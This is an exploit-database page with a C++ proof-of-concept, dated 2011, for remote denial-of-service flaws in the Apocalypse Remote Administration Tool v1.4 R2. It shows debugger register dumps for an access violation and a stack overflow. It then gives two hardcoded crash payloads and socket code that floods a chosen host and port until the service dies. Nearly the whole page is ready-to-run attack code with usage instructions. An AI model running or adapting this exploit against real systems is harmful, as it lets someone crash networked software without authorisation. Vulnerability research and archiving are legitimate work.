Apocalypse Remote Administration Tool v1.4 R2 multiple vulnerabilities



EKU-ID: 364 CVE: OSVDB-ID:
Author: Kevin R.V Published: 2011-05-31 Verified: Verified
Download:

Rating

☆☆☆☆☆
Home


/*  Apocalypse Remote Administration Tool v1.4 R2 multiple remote denial of service vulnerabilities
*  Author: Kevin R.V <kevin.nullbyte@gmail.com>
*    Date: 2011
* License: Totally free 8-)
*
* */


/*
    Access violation when try to write in 0x000003F4
    EAX 00000000
ECX 00000000
EDX 00000000
EBX 02E6CC88
ESP 00103ED0
EBP 00103F04
ESI 00000000
EDI 00458CA4 Client.00458CA4
EIP 00509AB5 Client.00509AB5
C 0  ES 0023 32bit 0(FFFFFFFF)
P 1  CS 001B 32bit 0(FFFFFFFF)
A 0  SS 0023 32bit 0(FFFFFFFF)
Z 1  DS 0023 32bit 0(FFFFFFFF)
S 0  FS 003B 32bit 7FFDE000(FFF)
T 0  GS 0000 NULL
D 0
O 0  LastErr ERROR_SUCCESS (00000000)
EFL 00010246 (NO,NB,E,BE,NS,PE,GE,LE)
MM0           0.0,  1.121039e-44
MM1 +NAN 7FFDE6F4,  8.506428e+33
MM2 -9.846953e+26, -6.258335e+15
MM3 -8.745139e+07,   0.005859086
MM4 -2.466859e-33, -6.343342e-15
MM5 -1.084202e-19,           0.0
MM6 -2.466859e-33, -6.343342e-15
MM7           0.0,           0.0 */

/*

Stack overflow

EAX 034D1694
ECX 00498E00 Client.00498E00
EDX 00000690
EBX 034D1694
ESP 0003251C
EBP 00033518
ESI 021901D1
EDI 000335D8
EIP 0049A3DD Client.0049A3DD
C 1  ES 0023 32bit 0(FFFFFFFF)
P 0  CS 001B 32bit 0(FFFFFFFF)
A 0  SS 0023 32bit 0(FFFFFFFF)
Z 0  DS 0023 32bit 0(FFFFFFFF)
S 0  FS 003B 32bit 7FFDE000(FFF)
T 0  GS 0000 NULL
D 0
O 0  LastErr ERROR_SUCCESS (00000000)
EFL 00010203 (NO,B,NE,BE,NS,PO,GE,G)
MM0           0.0,  1.121039e-44
MM1 +NAN 7FFDE6F4,  8.506428e+33
MM2 -1.570600e-32,  5.571002e-41
MM3     -1.196440,     -1.191965
MM4  -0.008783944,     -1.009549
MM5  5.791298e-39,           0.0
MM6 -5.082198e-21,           0.0
MM7 -7.754818e-26,           0.0 */



#include <iostream>
#include <winsock2.h>

#define VERS "0.1"

int   connected;
using namespace std;


char Access_violation[] =
{
0x33,0x36,0x37,0x7C,0x78,0x01,0x8D,0x50,0xCD,0x4A,0xC3,0x40,0x10,
0x0E,0x7A,0xE8,0xC5,0xBB,0x47,0x17,0x4F,0xF6,0x90,0xB2,0xBB,0x4D,
0x93,0xD6,0x5B,0x7F,0xA2,0xF4,0x90,0x52,0x48,0x40, 0xC1,0x88,0x2C,0x49,
0x1A,0x57,0xD2,0xDD,0x92,0x4D,0x51,0x61,0xEF,0xBE,0x40,0x5F,0x40,
0xF0,0x15,0x04,0x8F,0xDE,0xF5,0xE6,0x13,0x14,0xBC,0x2A,0x82,0x07,
0xC1,0x93,0x13,0x2C,0xD8,0x43,0x85,0x7E,0xC3,0x0C,0xDF,0xCC,0xCE,
0xCC,0xCE,0x4C,0x87,0xA5,0x19,0x13,0x9A,0x4D,0x64,0xC4,0xB2,0xEB,
0x89,0x4A,0x80,0xE2,0x05,0x3D,0x6B,0x58,0xDD,0x0E,0xC6,0x2D,0x4B,
0x07,0x89,0x2A,0xB8,0x48,0xCD,0x61,0xA4,0x03,0xD7,0x0F,0xFA,0x83,
0x43,0xB3,0x6D,0xB7,0x5D,0x52,0xEF,0x68,0x42,0x9D,0x1A,0x06,0x21,
0x7A,0x20,0x0B,0xD4,0x17,0xAA,0x60,0x59,0x96,0xC4,0x9A,0xD4,0xAC,
0x9A,0x85,0x3A,0xD3,0x14,0x1D,0xF0,0x2B,0xF0,0xA9,0x8D,0xB5,0x3F,
0x61,0x5C,0x94,0x56,0x70,0x75,0xAE,0xDB,0xF1,0x98,0x03,0x29,0x72,
0x56,0xC8,0x5C,0x53,0xD2,0x22,0xDA,0x78,0xFC,0xDA,0x31,0x00,0xFA,
0x88,0x8B,0x58,0x5E,0x2A,0x74,0x3C,0x44,0x7B,0xC3,0x5C,0x8E,0x12,
0xA5,0xB8,0x14,0x2C,0xAB,0x6A,0x0C,0xD2,0xDD,0x0F,0x4B,0xED,0xC9,
0x68,0x3A,0x4E,0x44,0xA1,0x10,0x13,0x31,0xF2,0x93,0xA2,0x9C,0x51,
0x85,0x7F,0xC3,0x86,0xAE,0x8A,0x72,0x0E,0xDD,0xB9,0x5C,0xB3,0xC0,
0xE3,0x0A,0xC5,0x8B,0xB6,0x52,0xAD,0x59,0xD4,0x95,0x62,0xC4,0xD3,
0x69,0xCE,0x22,0xFE,0x29,0x50,0x56,0x5E,0x32,0xEC,0xC1,0x52,0xD0,
0x2A,0x41,0x93,0x5C,0xA6,0x39,0x1B,0xB3,0x50,0xBB,0xFE,0xD2,0x6D,
0xF5,0x1D,0xAC,0x59,0xEA,0x26,0x68,0xA3,0x41,0x1D,0xCB,0xB4,0x2D,
0x6C,0x62,0xBB,0x45,0x5B,0x4D,0x62,0xD2,0x3A,0x26,0x96,0x51,0x83,
0xB7,0x36,0xA5,0x26,0x06,0x10,0xE0,0x25,0xE2,0x53,0xEF,0xF9,0xFB,
0x63,0x6B,0x77,0x56,0xAD,0xBC,0xBF,0x94,0x09,0x00,0xF7,0x66,0xEE,
0xDD,0xDF,0x56,0x7E,0x9D,0x15,0xD6,0xB1,0x9B,0xD8,0x59,0xC4,0x1F,
0xE0,0xC3,0x99,0xF1,0x14,0x18,0x1B,0x86,0x41,0xE9,0x8A,0xE4,0xA5,
0xD0,0xC9,0xC5,0xEB,0xDB,0x36,0xF8,0xFF,0xCC,0xE7,0x8D,0xE7,0x9E,
0xFE,0x01,0xF0,0xF2,0xA8,0x97
};

char stack[] =
{
0x33,0x36,0x37,0x7C,0x78,0x01,0x8D,0x50,0xCD,0x4A,0xC3,0x00,0x10,
0x0E,0x7A,0xE8,0xC5,0xBB,0x47,0x17,0x4F,0xF6,0x90,0xB2,0xBB,0x4D,
};




int PoC(char * host, unsigned int port, unsigned int vuln)
{
WSADATA wsa;
WSAStartup(MAKEWORD(2,0),&wsa);
SOCKET sock;
    struct sockaddr_in  local;
    sock=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP);
local.sin_family = AF_INET;
local.sin_addr.s_addr = inet_addr(host);
local.sin_port = htons(port);
if (connect(sock, (struct sockaddr *)&local, sizeof(local) ) == 0 )
{
    connected = 1;
    cout << ".";
    for(int i = 0; i<99; i++)
    {
if ( vuln == 0 )
sendto(sock, Access_violation, sizeof(Access_violation), 0, (struct sockaddr *)&local,sizeof(local));
else
sendto(sock, stack, sizeof(stack), 0, (struct sockaddr *)&local,sizeof(local));
}


PoC(host, port, vuln);
}

else
{
if ( connected )
cout << endl << endl << "[+] Congrats Apocalypse crashed!" << endl;
else
cout << endl << endl << "[-] Sorry not Apocalypse detected :(" << endl;
}
}
int main(int argc, char *argv[])

{
cout << "\nApocalypse Remote Administration Tool v1.4 R2 multiple remote denial of service vulnerabilities" VERS << endl << endl;
cout << "by Kevin R.V <kevin.nullbyte@gmail.com" << endl;
if ( argc < 6 )
{
cout << "Usage: " << argv[0] << ".exe -h <ip> -p <port> -v <vuln type>" << endl << endl;
cout << "vuln list : " << endl;
cout << "0- Access violation, try to write in not allowed memory" << endl;
cout << "1- Stack overflow" << endl;
exit(-1);
}

u_short port;
char * ip;

u_short v_type = 0;

for(int i = 0; i<argc; i++)
{
if( ! strcmp(argv[i], "-h") != 0 )
ip = argv[i+1];
else if( ! strcmp(argv[i], "-p") != 0 )
port = atoi(argv[i+1]);
else if( ! strcmp(argv[i], "-v") != 0 )
v_type = atoi(argv[i+1]);
}

cout << "[+] Starting exploit" << endl << endl;
PoC(ip, port, v_type);


return 1;
}